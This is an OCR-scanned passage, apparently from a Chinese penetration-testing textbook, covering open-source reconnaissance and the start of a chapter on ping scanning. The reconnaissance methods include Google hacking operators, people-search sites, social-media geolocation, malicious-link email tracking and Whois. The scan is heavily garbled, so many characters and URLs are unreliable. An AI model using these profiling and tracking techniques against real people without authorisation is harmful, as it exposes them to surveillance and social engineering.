在 本 练习 中 ， 将 使 用 www.netcraft.com 网 站 查看 有 关 日 标 站 点 的 信息 。 
(]) 浏览 网 站 www.netcraft.com。 
(2) 在 What's That Site Running 杠 中， 输入 www.microsoft.com。 
(3) 按 回 车 键 。 
(4) 但 看 结果 中 的 信息 。 
要 特别 注意 有 关 IP 地 址 、 操 作 系 统 和 Web 服 务 器 的 信息 ， 因 为 这 对 后 续 的 目标 攻 
击 十 分 有 用 。 


5.3 ”找到 不 复 存 在 的 网 站 


如 果 想 查看 一 个 不 再 存在 的 网 站 或 是 现存 网 站 的 旧版 本 ， 应 该 怎么 做 ? 有 一 个 名 为 
Archive.org 的 网 站 ， 可 使 用 该 网 站 称 为 “Wayback Machine( 时 光 回 渊 机 )” 的 功能 来 实现 该 
操作 。 使 用 Wayback Machine， 可 以 找到 网 站 的 归档 副本 ， 用 于 检查 且 可 能 提取 出 信息 并 
投入 使 用 。 笔 者 兽 有 找到 企业 的 旧 目 录 、 技 术 信 息 、 项 目 和 客户 信息 等 副本 的 经 历 。 


练习 5.3: 使 用 Wayback Machine 查 找 归 档 网 站 

在 本 练习 中 ， 将 使 用 Wayback Machine 查 看 网 站 的 存档 版 本 。 

(1) 浏览 www.archive.org。 

(2) 在 Wayback Machine 旁 的 输入 框 中 ,输入 要 查看 的 网 站 的 名 称 。 对 于 本 练 
习 ， 有 可 输入 wwwmicrosoft.com。 

(3) 单 击 Browse History 。 

(4) 在 结果 中 ， 可 看 到 信息 项 部 是 年 份 ， 下 面 则 是 日 期 。 单 击 一 个 日 子 碍 看 网 站 
的 旧版 本 。 

可 以 简单 地 通过 依次 单 击 年 份 和 日 期 来 调整 日 期 查看 当日 的 该 网 站 。 


5.4 用 搜索 引擎 收集 信息 


你 所 喜欢 的 搜索 引擎 是 可 为 搜寻 有 用 信息 提供 很 大 帮助 的 工具 之 一 。 搜 索引 擎 已 证 明 
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了 目 己 是 定位 和 访问 信息 不 可 或 缺 的 资源 。 虽 然 搜 索引 擎 很 有 用 ， 但 是 大 多 数 人 只 用 到 了 
其 一 小 部 分 功能 ， 也 就 是 简单 地 和 输入 条 目 和 得 询 结果 。 这 对 渗透 测试 者 而 言 还 远 远 不 够 ， 
需要 更 深层 次 地 挖掘 搜索 引擎 的 功能 。 利 用 谷歌 和 必 应 等 搜索 引擎 ， 可 以 便捷 完善 地 访问 
很 多 用 其 他 方式 很 难 找到 的 信息 。 虽 然 有 时 客户 可 能 想 保密 茶 些 信息 ， 但 是 通过 使 用 正确 
的 决 突 ， 就 能 找到 这 些 信息 并 利用 它 。 


5.4.1 利用 谷歌 进行 黑客 活动 


由 于 谷歌 可 谓 最 全 面 和 最 受 欢迎 的 搜索 引擎 ， 本 书 将 聚焦 于 谷歌 黑客 技术 。 使 用 谷歌 
进行 黑客 活动 并 非 什 么 新 鲜 事 物 ， 事 实 上 ， 这 一 能 力 已 在 Google 的 服务 中 存在 了 许久 。 只 是 
许多 用 户 不 知道 它 的 存在 或 不 知道 如 何 使 用 它 。 使 用 Google 黑 客 技术 ， 可 以 提取 很 多 信息 ， 
例如 获取 诸如 密码 、 特 定 文件 类 型 、 敏 感 文件 夹 、 登 录 门 户 、 配 置信 息 以 及 其 他 数据 等 。 

实现 Google 黑 客 技术 的 关键 是 以 下 一 些 操作 符 。 

@ cache: 这 是 一 个 关键 字 ， 它 将 显示 某 个 网 页 在 Google 绥 存 中 的 版 本 ， 而 非 其 当前 

版 本 。 
用 法 : cache:< 网 站 名 > 
@ link: 用 于 列 出 所 有 包含 指 同 但 询 中 指定 的 页 面 或 网 站 的 链接 的 Web 页 面 。 
用 法 : link:< 网 站 名 > 
@ info: 提供 列 出 页 面 的 有 关 信 息 。 
用 法 : info:< 网 站 名 > 
@ site: 限定 在 指定 网 络 位 置 搜索 。 
用 法 : < 关键 字 > site:< 网 站 名 > 
@ allintitle: 返回 标题 中 含有 指定 查询 关键 字 的 网 页 。 
用 法 : ”allintitle:< 关 键 字 > 
@ allinurl: 只 返回 URL 中 包含 指定 查询 关键 字 的 结果 。 
用 法 : allinurl:< 关 键 字 > 
如 果 遇 到 困难 或 想 进行 更 多 高 级 和 查询， 建议 查阅 www.hackersforcharity.com 处 的 
Google 黑 客 数据 库 (GHDB)。 


5.4.2 ”获取 搜索 引擎 告警 


告警 是 搜索 引擎 的 另 一 项 并 不 引 人 注 意 的 但 却 应 考虑 作为 信息 搜集 的 一 部 分 的 功能 。 
许多 搜索 引擎 包含 告警 功能 ， 该 功能 将 在 有 满足 搜索 条 件 的 内 容 发 布 时 通知 搜索 者 。 在 
需要 进行 其 他 方面 的 测试 工作 时 ， 可 考虑 使 用 告警 作为 一 种 持续 关注 搜索 过 程 的 手段 。 
5.3 显 示 了 Google Alerts 页 面 。 
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Create a Google Alert Sending HTML emails. Switch to text emalls 
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U:bebstan News once a day edit | delete 


图 $.3 ”Google Alerts 页 面 


练习 5.4: 使 用 Google Alerts 获 取信 息 

在 本 练习 中 ， 将 完成 设置 和 修改 Google 告 等 的 过 程 。 

( 在 浏览 需 中 访问 www.google.comyalerts。 

(2) 输入 要 接收 告警 的 搜索 。 输 入 搜索 后 ， 就 会 显示 告警 样 例 。 如 果 结 果 不 可 接 
受 ， 修 改 搜 索 内 容 。 如 条 需要 ， 可 以 使 用 Google 黑 客 技 术 ， 进 一 步 优化 或 更 好 地 年 
位 搜索 内 容 。 

(3) 输入 一 个 有 效 的 电子 邮件 地 址 ，Google 将 使 用 该 地 址 给 你 发 送 查 询 的 结果 。 
建议 设置 一 个 免费 邮件 账户 或 特殊 账户， 用 于 接收 这 些 告 党 ， 以 便于 管理 。 必 须 单 
击 Google 发 送 给 你 的 电子 邮件 中 的 链接 ， 确 认 此 搜索 。 

告警 设置 现 已 完成 。 


S.S 使 用 搜 人 网 站 定位 员工 


目前 你 已 能 够 简单 地 收集 到 很 多 信息 ， 现 在 请 把 关注 重点 放 到 这 些 信息 之 中 的 一 项 ; 
人 。 在 搜索 和 其 他 调查 过 程 中 ， 可 能 会 发 现 一 些 为 目标 企业 工作 的 人 员 姓 名 。 如 果 发 现 
了 ， 调 查 这 些 人 并 尝试 是 否 能 有 所 发 现 是 十 分 值得 的 。 

当然 ， 可 以 用 Google 获 取 有 关 茶 人 的 信息 ， 但 也 有 更 多 专门 用 于 研究 人 物 的 针对 性 资源 ， 
既 有 收费 服务 ， 也 有 免费 服务 。 有 许多 收费 服务 提供 的 信息 只 是 简单 地 汇总 其 他 免费 资源 的 信 
轧 ， 也 有 其 他 一 些 能 提供 独 有 的 信息 。 这 两 种 服务 笔者 均 使 用 过 ， 基 本 没有 发 现 区 别 。 

下 面 是 一 些 可 选 的 搜 人 服务 。 

@ Spokeo: www.spokeo.com 

@ Pipl: www.pipl.com 


@@ Yasnl: WwWWw.yasni.com 


第 5 草 情报 收集 国生 


Zabasearch: www.zabasearch.com 


Intellus: www.mtelius.com 
ZoomInfo: www.zoomlnto.com 
Infospace: Wwww.Infospace.com 
kgb: www. ksgbpeople.com 
People: www.peepdb.com 
Radarls: Www.Tadarls.com 

上 述 搜索 引擎 中 的 每 一 个 都 提供 有 关 个 人 的 信息 ， 如 果 没 有 找到 目标 ， 不 要 灰心 ， 换 
个 搜索 引擎 试 试 。 

此 外 ， 需 要 注意 的 是 ， 应 始终 对 找到 的 个 人 信息 进行 交叉 检查 ， 并 与 其 他 来 源 进行 比 
较 以 确定 其 准确 性 。 这 些 消费 级 服务 的 信息 陈旧 、 缺 失 或 错误 的 现象 并 不 罕见 。 笔 者 在 查 
询 自己 的 个 人 信息 以 看 看 能 找到 什么 时 就 遇 到 过 这 种 情况 。 

最 后 ， 在 答 试 使 用 在 此 列 出 的 工具 和 网 站 时 ， 请 确 休 有 权 碍 看 他 人 的 详细 信息 。 虽 和 然 
可 能 性 不 大 ， 但 是 在 荣 些 地 方 ， 对 一 个 人 太 过 “好 奇 ” 可 能 会 触犯 当地 的 法 律 。 


S.6 发 现 位 置信 息 


当然 ， 组 织 中 的 人 需要 在 某 个 地 方 设置 办 公 室 和 工作 区 ， 但 如 何 进 一 步调 查 这 些 设 
施 ? 由 于 地 址 信息 在 网 上 很 常见 ， 因 此 通常 可 在 调查 过 程 中 发 现 。 此 外 ， 了 解 一 个 公司 的 
地 理 位 置 有 助 于 废弃 物 信 息 收 集 、 社 会 工程 以 及 其 他 本 书 尚 未 介绍 的 方法 。 可 由 谷歌 街景 
(Google Street View) 获 得 的 信息 的 例子 如 图 5.4 所 示 。 
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图 5.4 ”谷歌 街景 
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知道 某 个 地 址 后 ， 除 了 驱车 前 往 调 查 外 ， 还 能 干什么 昵 ? 事实 证 明 ， 许 多 网 站 和 技术 
能 够 随时 提供 帮助 。 


谷歌 地 球 
这 种 流行 的 卫星 成 像 实 用 程序 现 已 有 12 年 以 上 的 历史 ， 在 这 段 时 间 里 ， 它 已 取得 长 足 
进步 ， 可 以 提供 更 多 的 信息 和 其 他 数据 。 


合 歌 地 图 
与 谷歌 地 球 相同 ， 谷 歌 地 图 也 可 以 提供 许多 信息 ， 包 括 区 域 信息 和 类 似 数据 。 


谷歌 街景 

这 种 Web 应 用 程序 是 从 (街道 上 ) 汽 车 的 视角 观看 (道路 旁 的 ) 企 业 、 住 宅 和 其 他 位 置 。 
许多 观察 者 使 用 这 个 实用 程序 ， 可 以 看 到 人 员 、 入 口 等 更 加 详细 的 信息 ， 甚 至 还 可 以 通过 
公司 的 窗户 看 到 工作 的 人 员 。 


Web 摄 像 头 

摄像 头 比 比 皆 是 ， 它 们 可 以 提供 有 关 位 置 或 人 员 的 信息 。 事 实 上 ， 例 如 流行 的 Shodan 
搜索 引擎 (www.shodan io) 等 工具 能 够 专门 搜索 Web 摄 像 头 以 及 其 他 设备 。 

将 这 些 工具 与 Google 黑 客 技术 配合 使 用 ， 可 令 你 事半功倍 ， 只 需要 花费 很 少 的 努力 即 
可 在 短 时 间 内 获取 大 量 的 信息 。 


$5.7 应 用 社交 网 络 


社交 网 络 已 成 为 了 一 种 不 但 产 出 极其 丰富 而 且 价 值 不 可 估量 的 信息 收集 工具 。 在 社交 
网 络 中 ， 用 户 有 意 无 意 地 过 度 分 享 信息 可 谓 司空 见 惯 。 对 大 多 数 人 而 言 ， 同 家 人 和 朋友 共 
享 社 交 网络 服 务 的 愿望 比 社交 网 络 可 能 导致 的 潜在 信息 泄露 更 重要 。 

由 于 这 些 服务 的 特性 和 它们 追求 信息 共享 的 开放 性 和 便 
bp 社交 网 络 是 同 朋友 和 ” 捷 性 的 倾向 ， 攻 击 者 不 需要 进行 大 量 工 作 ， 即 可 获取 有 关 人 
家 人 沟通 的 优秀 工具 , 但 员 及 他 们 相互 关系 的 有 用 细节 。 在 这 些 服务 中 ， 有 望 找到 各 
如 末 使 用 不 当 ， 黑 客 能 够 。 种 各 样 的 信息 一 一 信息 量 可 能 大 到 无 法 全 部 处 理 。 收 集 的 信 


wpe 息 可 以 派 上 许多 用 场 ， 例如 找到 可 用 于 对 个 人 进行 社会 工程 
Ue 攻击 的 信息 ， 具 体 来 说 就 是 通过 使 用 目标 熟悉 的 术语 和 名 字 
骗取 信任 。 
某 些 适合 用 于 搜寻 目标 相关 信息 的 流行 社交 网 络 服务 或 许 你 已 经 很 熟悉 。 
Facebook 


Facebook 是 世界 上 最 大 的 社交 网 站 ， 拥 有 非 第 大 的 用 户 群 ， 有 大 量 的 群体 在 其 上 分 至 
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兴趣 爱好 。 此 外 ， 许 多 网 站 使 用 Facebook 登 录 或 分 享 评论 ， 这 进一步 扩大 了 其 影 啊 。 


Twitter 

Twitter 是 男 一 个 备 受 欢迎 的 社交 网 站 。 它 有 数 以 百 万 计 用 户 ， 其 中 许多 用 户 每 天 发 布 
更 新 多 次 。Twitter 在 安全 方面 提供 的 功能 很 少 ， 人 们 也 很 少 使 用 这 些 功能 。Twitter 的 用 户 
倾 问 于 发 布 大 量 的 信息 而 很 少 或 完全 不 考虑 他 们 发 布 的 内 容 的 价值 。 

Google+ 

Google + 是 谷歌 为 应 对 Facebook 挑 战 而 推出 的 服务 。 虽 然 该 服务 还 不 如 Facebook 那 样 
广泛 普及 ， 但 网 站 上 也 有 大 量 可 供 搜索 和 利用 的 信息 。 

Linkedln 

LinkedIn 是 面 同 求职 者 的 社交 网 络 平台 ， 因 此 网 站 中 有 着 用 户 的 从 业经 历 、 联 系 方 
式 、 技 能 以 及 可 能 或 曾经 与 该 人 共事 的 人 员 名 单 。 

Instagram 

Instagram 服 务 设 计 用 于 与 他 人 分 享 照片 和 视频 ， 甚 至 可 以 将 信息 发 布 到 诸如 Facebook 
和 Tumblr 的 服务 上 。 人 们 经 常 将 招 摄 的 照片 和 视频 发 布 到 该 网 站 上 ， 而 不 考虑 他 们 是 否 应 


Tumblr 
这 是 另外 一 个 与 Twitter 相似 的 服务 ， 可 用 于 分 享 信息 ， 其 中 某 些 信 息 应 当 保 密 。 


YouTube 

虽然 人 们 将 YouTube 视 为 与 Facebook 和 Instagram 不 同类 的 网 站 ， 但 是 花 点 时 间 探 索 该 
服务 也 还 是 很 有 用 的 。 在 该 网 站 随意 朵 和 逛 一 番 ， 经 党 能 找到 许多 发 布 的 手机 视频 ， 并 且 视 
频 中 展示 了 茶 些 最 好 应 当 保 密 的 事情 。 

现在 你 已 经 知道 了 有 几 个 社交 网 络 可 用 于 搜索 信息 ， 而 每 个 社交 网 络 都 有 上 自己 的 内 
置 搜索 功能 ， 但 基于 上 述 信 息 ， 是 否 还 能 更 进一步 ? 答案 是 
肯定 的 一 一 不 仅 可 以 获取 人 们 的 信息 ， 还 可 根据 地 理 数 据 对 “是 也 可 通过 社会 工程 方 
信息 进行 定位 。 事 实 上 ， 有 一 个 工具 不 仅 可 以 找到 在 社交 媒 ” 式 获 取信 息 ， 该 内 容 将 在 
体 网 络 上 发 布 的 信息 ， 而 且 还 能 将 找到 的 信息 置 于 一 个 世 ”第 15 中 介绍 。 
界 地 图 中 ， 展 示 出 该 信息 的 发 布 时 间 和 地 点 。Echosec 工 具 
(http://app.echosec.net) 如 图 5.5 所 示 。Echosec 是 一 个 可 用 于 关注 特定 地 理 位 置 并 提取 从 该 
位 置 发 布 的 社交 网 络 帖子 信 息 的 网 站 。 该 工具 还 有 男 一 项 绝妙 的 强大 功能 ， 可 在 Twitter 不 
Instagram 上 搜索 特定 名 字 ， 从 而 进一步 简化 信息 获取 工作 。 

要 使 用 此 服务 ， 只 需要 给 出 一 个 位 置 并 花 一 点 时 间 。 对 拉 斯 维 加 斯 大 道 (Las Vegas 
Strip) 上 茶 个 位 置 的 搜索 结果 如 图 5.6 所 示 。 
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图 5.6 ”Echosec 搜 索 示例 


练习 S.S: 使 用 Echosec 
要 使 用 Echosec 检 查 给 定位 置 发 布 的 社交 媒体 帖子 ， 请 按 以 下 步 

(1) 在 浏览 硕 中 浏览 网 址 https:Wapp.echosec net。 

(2) 在 位 置 框 中 输入 地 址 或 将 地 图 拖 动 到 某 个 位 置 ， 然 后 调整 缩放 比例 ， 将 所 需 
的 位 置 置 于 窗口 焦点 区 域 。 

(3) 单 击 页 面 底部 中 间 的 “Select Area( 选 择 区 域 ) 按钮 。 在 目标 区 域 周围 绘制 一 
个 框 。 

(4) 癌 下 深 动 页 面 以 查看 查询 的 结果 。 

由 于 某 些 人 使 用 社交 媒体 的 习惯 ,搜索 结案 中 有 可 能 出 现 色情 图 像 。 虽 然 这 种 
情况 并 不 常见 ， 但 却 不 时 发 生 。 


进 行 操作 
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S.8 通过 金融 服务 查找 信息 


当 攻 击 者 的 目标 是 特定 组 织 (具体 而 言 是 那些 可 公开 交易 的 上 市 公司 ) 时 ， 还 有 另外 一 
些 资源 可 用 于 收集 信息 。 诸 如 雅虎 、 谷 歌 、CNBC、USA Today 以 及 无 数 的 类 似 金 融 服 务 
均 能 够 提供 有 关 某 个 公司 的 、 用 其 他 方式 无 法 获取 的 信息 。 服 务 商 提供 这 些 信息 的 本 意 是 
为 了 使 投资 者 更 易于 获取 企业 的 信息 ， 以 便 做 出 明智 的 投资 决策 。 然 而 ， 这 些 信息 可 以 给 
渗透 测试 者 或 攻击 者 提供 一 些 能 进一步 推进 测试 的 隐藏 信息 宝藏 。 

要 在 这 些 网 站 搜索 信息 ， 只 需要 浏览 所 选择 的 网 站 并 在 网 站 上 输入 股票 代码 (如 果 已 
知 ) 或 公司 名 称 进 行 搜索 。 

你 也 许 会 目 问 ， 在 这 些 网 站 中 碍 询 目 标的 竞争 对 手 情况 时 能 够 获得 什么 信息 。 几 乎 每 
一 个 列 出 各 家 公司 的 商业 和 投资 网 站 都 会 同时 说 明 该 公司 的 竞争 对 手 。 此 外 ， 使 用 相同 的 
资源 还 可 以 查找 正 与 目标 合作 的 第 三 方 供应 商 。 为 什么 要 对 公司 的 合作 伙伴 感 兴 趣 ? 通过 
调查 合作 伙伴 (例如 同 供应 商 下 达 的 部 件 和 服务 订单 )， 可 以 侧面 了 解 目 标 公 司 内 部 的 运行 
情况 。 在 安全 行业 中 将 这 种 方法 称 为 推论 ， 也 即 基 于 间接 证 据 做 出 假设 。 

在 分 析 这 些 资源 时 ， 请 始终 关注 那些 可 能 具备 预示 价值 的 特定 类 型 信息 ， 例 如 : 

@ 公司 是 何 时 成 立 的 ? 寻找 可 能 提示 公司 未 来 的 具体 发 展 方 回 的 那些 公司 发 展 史 

信息 。 

@ 公司 是 如 何 发 展 起 来 ? 用 于 深入 了 解 公 司 的 业务 策略 、 哲 学 和 公司 文化 。 

@ 企业 的 领导 者 是 哪些 人 ? 用 于 进一步 对 这 些 个 人 进行 背景 分 析 。 

@ 有 时 可 能 有 用 的 办 公 室 的 位 置 和 人 员 的 分 布 信息 。 


5.9 调查 职位 招聘 公告 栏 


就 业 网 站 是 目标 技术 和 组 织 架 构 信 息 的 一 个 良好 来 源 。 如 果 浏 览 过 职位 招聘 广告 ， 必 
然 会 注意 到 其 中 的 技能 和 经 验 章节 。 找 到 诸如 基础 设施 数据 、 操 作 系统 信息 和 其 他 有 用 数 
据 之 类 信息 的 情况 也 不 罕见 。 记 住 ， 发 布 招聘 信息 的 公司 都 希望 找到 合格 的 雇员 ， 它 们 需 
要 确保 应 聘 者 具备 合格 的 技能 ， 因 此 这 些 信息 都 会 包含 在 职位 招聘 信息 中 。 

分 析 招 聘 信息 时 ， 应 注意 以 下 内 容 : 

@ 职位 要 求 和 经 验 。 


e@ 雇主 信息 。 

e@ 雇员 信息 。 

e@ 硬件 信息 。 这 在 简介 中 非常 常见 ， 可 以 寻找 诸如 思科 、 微 软 之 类 的 关键 字 ， 其 中 
可 能 还 包括 型 号 或 版 本 号 。 

e@ 软件 信息 。 


二 ; 参 郁 测 i 式 入 | 实战 


5.10 ”搜索 电子 邮件 


电子 邮件 是 一 个 当今 所 有 商业 活动 都 依赖 的 工具 。 对 恶意 团体 和 渗透 测试 者 而 言 ， 电 
子 邮 件 携带 的 信息 量 是 惊人 的 ， 对 于 寻找 任何 类 型 信息 的 攻击 者 都 很 有 价值 。 对 一 个 渗透 
测试 人 员 或 攻击 者 而 言 ， 目 前 有 很 多 工具 可 以 具体 用 于 执行 这 项 功能 。 

PoliteMaill 是 一 个 十 分 有 用 的 可 从 电子 邮件 中 收集 信息 的 工具 。 该 工具 能 够 创建 并 跟 
踪 邮 件 客户 端 内 的 通信 。 如 果 能 从 目标 组 织 获取 一 个 邮件 地 址 列表 ， 该 工具 就 能 发 挥 作 
用 。 在 获取 这 样 一 个 邮件 地 址 列表 后 ， 可 向 其 中 的 地 址 发 送 含 有 恶意 链接 的 电子 邮件 。 一 
旦 电子 邮件 被 开启 ，PoliteMail 会 通知 你 每 个 中 招 个 体 的 活动 信息 。 

另 一 个 值得 一 提 的 工具 是 WhoReadMe。 该 应 用 程序 设计 用 于 跟踪 电子 邮件 ， 但 它 同 
时 还 能 提供 受害 者 计算 机 上 安装 的 操作 系统 、 浏 览 器 类 型 和 ActiveX 控 件 等 信息 。 这 些 信 
轧 对 于 后 续 更 精准 地 确定 攻击 目标 非常 有 价值 。 


$5.11 提取 技术 信息 


垃 运 的 是 ， 目 前 有 各 种 各 样 的 方法 可 以 收集 目标 组 织 中 系统 的 技术 信息 。 

Whois 是 一 个 古老 但 很 有 用 的 工具 。 起 初 ， 该 实用 程序 是 为 Unix 系 统 开 发 的 ， 后 来 它 
也 成 为 Linux 的 一 部 分 ，Windows 平 台 下 也 有 免费 下 载 。 此 外 ， 通 过 简单 Web 搜 索 即 可 找到 
大 量 可 在 线 使 用 该 工具 的 网 站 。 

Whois 设 计 用 于 收集 有 关 域 名 或 网 址 的 信息 。 该 命令 的 结果 包含 网 站 所 有 者 信息 、IP 
信息 、DNS 信 息 和 其 他 一 些 可 以 使 用 的 数据 。 


练习 5.6: 使 用 Whois 

进行 本 练习 前 ， 需 要 先 在 http://technet.microsoft.com/en-us/sysinternals/bb897435. 
aspx 处 下 载 适 用 于 Windows 的 Whois。 

(1) 下 载 完 文件 后 ， 将 其 解压 缩 到 桌面 上 名 为 whois 的 文件 夹 中 。 

(2) 按 住 Shift 键 ， 右 键 单 击 whois 文 件 夹 ; 然后 选择 “Open Command Window 
Here( 在 此 处 打开 命令 窗口 ) 。 

(3) 在 命令 提示 符 中 ， 输 入 whois < 域名 >， 例 如 whois usatoday.com。 

(4) 查看 结果 的 细 市 。 

结果 中 可 能 包含 几 个 有 用 的 关键 细节 。 具 体 而 言 ， 应 注意 地 址 信息 、 电 话 号 
码 、 名 称 和 名 称 服务 化 信 息 。 应 标注 这 些 信息 ， 以 备 后 续 使 用 。 
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越 来 越 多 的 域名 所 有 者 开始 利用 服务 ， 掩 藏 除 域名 服务 器 以 外 的 所 有 信息 。 这 
些 服 务 对 于 攻击 者 来 说 不 是 好 事 ， 因 为 使 用 它们 会 阻止 获取 信息 ， 但 是 对 于 域名 所 
有 者 而 言 ， 这 是 一 个 好 做 法 ， 应 当 推荐 。 


S.12 “本 童 小结 


本 章 学 习 了 收集 目标 情报 的 不 同 手段 。 这 些 手 段 包 括 检查 目标 网 站 、 碍 找 可 能 不 再 存 
在 的 旧版 网 站 、 使 用 搜索 引擎 、 对 目标 员工 进行 人 员 搜索 、 发 现 地 址 和 位 置信 息 、 调 查 社 
交 网 站 、 碍 看 财务 信息 、 调 查 招聘 信息 、 搜 索 电 子 邮 件 、 用 Whois 提 取 技 术 信息 以 及 使 用 
社会 工程 学 技巧 。 

情报 收集 研究 是 一 个 识别 那些 可 能 对 后 续 测 试 阶段 有 用 的 信息 的 细致 过 程 。 研 究 和 揭 
露 目标 的 细节 需要 一 些 时 间 才 能 完成 ， 但 如 果 有 助 于 优化 后 续 操 作 来 提高 其 效率 ， 那 就 是 
磨 刀 不 误 砍 染 工 。 男 外 ， 谨 记 所 发 现 的 信息 应 该 清楚 地 记录 在 案 ， 以 让 客户 判断 是 否 不 必 
要 地 泄露 了 过 多 的 信息 。 


S.13 “过 题 


1. 进行 侦察 时 ，Whois 有 何 功能 ? 

2. Wayback Machine( 时 光 回 调 机 ) 在 获取 有 关 网 站 的 信息 方面 非常 有 用 。 为 什么 ? 
3. 何 为 OSINT? 

4. 使 用 Google 黑客 技术 为 什么 可 能 比 正常 使 用 Google 更 有 用 ? 

5. Echosec 非常 有 用 ， 它 能 够 从 哪些 来 源 收集 信息 ?这 有 何 重 要 意义 ? 


和 枚 举 


扫 


在 收集 了 与 目标 相关 的 信息 后 ， 即 可 转 到 扫描 和 枚 举 步 又 。 扫 描 包 括 ping 扫 搞 、 端 口 
扫描 及 漏洞 扫描 。 枚 党 则 是 从 公开 的 和 通过 扫描 发 现 的 信息 (如 用 尸 名 、 共 享 数据 、 信 息 
等 ) 中 提取 出 有 意义 信息 的 过 程 。 


本 章 将 学 习 : 
ping 扫 描 
端口 扫描 
识别 操作 系统 
寻找 漏洞 
使 用 代理 
执行 枚 举 操作 
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6.1 扫描 向 介 


扫描 是 一 个 非常 宽泛 的 术语 ， 它 包罗 万 象 ， 涵 盖 了 多 种 不 同 的 搁 术 ， 其 中 每 种 都 是 茶 
种 特定 类 型 的 扫 摘 。 

e@ ping 扫 描 用 于 检查 存活 系统 。 此 扫 摘 的 目的 是 搜索 一 个 子 网 或 耻 地 址 列表 ， 以 确定 

哪些 地 址 后 存在 开局 电源 正在 运行 的 系统 。 被 识别 为 运行 中 的 那些 系统 将 作为 下 
一 步 更 具体 行动 的 目标 。 

@ 冰 口 扫描 是 针对 个 体 卫 地 址 进行 的 扫描 ， 该 扫 摘 试图 识别 茶 个 特定 系统 上 开局 和 

关闭 的 器 口 。 每 个 打开 的 器 口 都 可 能 有 一 个 与 之 关联 的 可 供 后 续 利 用 的 服务 。 

e@ 漏洞 扫描 寻找 环境 中 的 弱点 或 问题 ， 并 基于 扫 擅 的 结果 生成 报告 (第 7 章 介绍 了 关 

于 漏 调 扫 拉 的 内 容 )。 

上 述 每 种 扫 擂 方法 均 可 有 效 地 单独 使 用 ， 但 只 有 绪 合 运用 时 ， 才 能 真正 令 它 们 发 挥 各 
目的 强大 能 力 。 不 妨 如 此 想象 找 出 哪些 IP 地 址 后 有 一 个 存活 系统 ， 类 似 于 找到 一 个 有 效 
的 电话 号 码 。 但 拿 到 有 效 电话 号 人 码 只 是 获得 了 一 小 部 分 信息 ， 而 拨打 这 个 电话 号码 和 找 出 
电话 线路 的 兄 一 咒 是 什么 更 为 有 用 。 每 种 扫描 头 型 都 像 是 一 幅 较 大 拼图 的 一 个 碎片 ， 可 将 
它们 拼接 在 一 起 ， 获 得 整体 目标 的 较 清晰 视图 。 目 标的 视图 越 清 晰 ， 后 续 的 攻击 和 行动 就 


会 越 准确 。 而 且 ， 与 拼图 非常 相似 的 是 : 在 扫 摘 中 也 可 能 遇 到 “ 洞 ”， 必 须 猜 测 该 处 是 什 
么 东西 。 不 过 ， 只 要 有 足够 多 的 “碎片 ”， 即 使 缺失 一 块 也 不 会 造成 太 大 影响 ， 因 为 能 4 
对 缺失 的 内 容 做 出 有 根据 的 推断 。 

下 面 是 一 份 简 短 的 信息 列表 ， 在 扫描 时 应 可 获得 关于 它们 的 更 多 或 更 详细 信息 : 

@ “活动 ”系统 的 IP 地 址 ， 除 了 计算 机 ， 还 包括 平板 电脑 、 手 机 、 打 印 机 、 无 线 接 
入 点 等 。 
目标 系统 上 开启 和 关闭 的 端口 列表 。 
操作 系统 版 本 ， 很 多 情况 下 这 是 可 以 在 扫描 阶段 获得 的 (不 过 要 小 心 行事 ， 因 为 试 
图 识别 系统 的 行为 会 增加 被 检测 到 的 可 能 性 )。 
@ MAC 地 址 。 
三 服务 信息 。 
分 
Lj 


端口 数据 。 
根据 具体 情况 所 需 的 其 他 网 络 信息 。 
在 此 阶段 可 望 收 集 到 大 量 数据 ， 并 可 能 需要 相当 长 的 时 间 进 行 剖 析 和 评估 。 如 果 前 期 
信息 收集 已 经 很 全 面 充 分 ， 那 么 在 东 些 情况 下 可 简化 扫描 过 程 ， 因 为 可 以 (在 前 期 工作 的 
基础 上 ) 聚 焦 于 特定 的 项 目 。 


6.2 ”检查 存活 系统 


如 果 足 够 六 运 ， 在 情报 收集 阶段 获得 了 目标 网 络 的 人 P 范 围 ， 就 有 了 一 个 可 用 于 扫描 第 
一 步 的 可 能 有 效 的 目标 列表 。 为 提高 扫描 效率 ， 应 确定 哪些 地 址 具备 关联 系统 ， 以 作为 进 
一 步 的 工作 目标 。 检 查 活动 系统 最 简单 的 一 种 方法 是 使 用 流行 的 ping 功 能 ， 进 行 称 为 ping 
扫描 或 ICMP 扫 拉 的 流程 。 所 谓 ping， 就 是 通过 ping 命 令 查 明 给 定 系 统 状 态 ( 具 体 而 言 ， 是 
舍 啊 应 ) 的 过 程 。 如 果 系 统 回 复 了 ping 命 令 ， 则 系统 为 在 线 状态 ， 可 继续 对 其 进行 彻底 的 
扫描 ; 如 果 没 有 啊 应 ， 则 主机 可 能 离线 或 不 可 访问 ， 因 而 目前 不 能 作为 目标 。 实 际 上 ， 
ping 命 令 使 用 的 是 所 谓 Interet 控 制 消息 协议 (Internet Control Message Protocol，ICMP) 的 消 
轧 ， 因 此 这 项 技术 也 被 称 为 ICMP 扫 摘 。 该 命令 的 工作 原理 是 由 一 个 系统 回 另 一 个 系统 发 
ER 送 ICMP ECHO 请 求 。 如 果 后 者 是 活动 的 ， 它 将 回复 一 个 ICMP 
>》 npr。 放火 ECHO 应 答 响应 。 收 到 该 应 答 后 ， 即 确认 系统 为 在 线 或 活动 状 
墙 和 路 由 器 当当 会 在 外 部 态 。 ping 个 仅 可 以 探测 系统 是 台 正 在 运行 ， 还 可 获得 数据 包 从 
和 内 部 网 络 交 汇 的 边界 处 一 个 主机 到 另 一 个 主机 的 速度 和 返回 生存 时 间 (Time To Live， 
将 其 屏蔽 。 TTL) 的 信息 。ping 命 令 的 结果 如 图 6.1 所 示 。 
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B235.b.ahanaliedoge .net L233.66.245.53] with 3d2 butes of data 
Dut 


.bb dd .5 4: 
4 Received = 加。 Lostit 4 1 lossy, 


GB“\Users Hidi2787 2ping usil .rallydev .con 


下 .ralludev.com [63.146 .121.6] with 32 byute 
I | Ta 


图 6.1 ping 命 令 的 结果 


练习 6.1: 使 用 ping 

本 练习 中 ， 将 使 用 ping 命 令 检查 系统 是 否 处 于 活动 状态 。 

(1) 打开 命令 提示 符 。 

(2) 使 用 命令 格式 ping < 目标 IP> 或 ping < 目标 主机 名 >。 在 本 练习 中 ,使 用 ping 
WWW.mIicrosotft .como 

(3) 全 看 结果 。 

取决 于 你 的 具体 网 络 连 接 状 态 ， 应 该 能 够 看 到 4 个 响应 或 尝试 响应 ， 以 及 4 个 啊 
应 全 部 成 功 或 是 包含 一 个 或 多 个 失败 响应 ， 并 提示 主机 不 可 达 的 信息 。 如 果 所 有 响 
